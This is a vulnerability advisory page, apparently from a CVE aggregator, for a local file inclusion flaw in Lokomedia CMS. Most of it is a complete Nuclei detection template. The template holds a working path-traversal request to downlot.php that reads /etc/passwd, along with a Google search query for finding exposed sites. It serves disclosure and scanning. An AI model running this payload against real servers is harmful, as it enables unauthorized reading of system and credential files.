CVE-2010-2018: Lokomedia CMS - Local File Inclusion

日期: 2025-08-01 | 影响软件: Lokomedia CMS | POC: 已公开

漏洞描述

A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information.

PoC代码[已公开]

id: CVE-2010-2018

info:
  name: Lokomedia CMS - Local File Inclusion
  author: r3Y3r53
  severity: high
  description: A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information.
  reference:
    - https://cxsecurity.com/issue/WLB-2018070116
    - https://github.com/kangkuswae/CMS-Lokomedia
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2018
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2018
    epss-score: 0.00294
    epss-percentile: 0.52352
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:/semua-download.html
  tags: cve,cve2010,lfi,lokomedia,cms,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downlot.php?file=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/proses"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c5498f7e5d527430842ef5d3c6b5e6b19d4a2cde33447f7dc60c19a9a1f2c2c8022100b357e37f78b8e495c50ba30bf6531902bae95e8f411595920913cba832a02f6e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐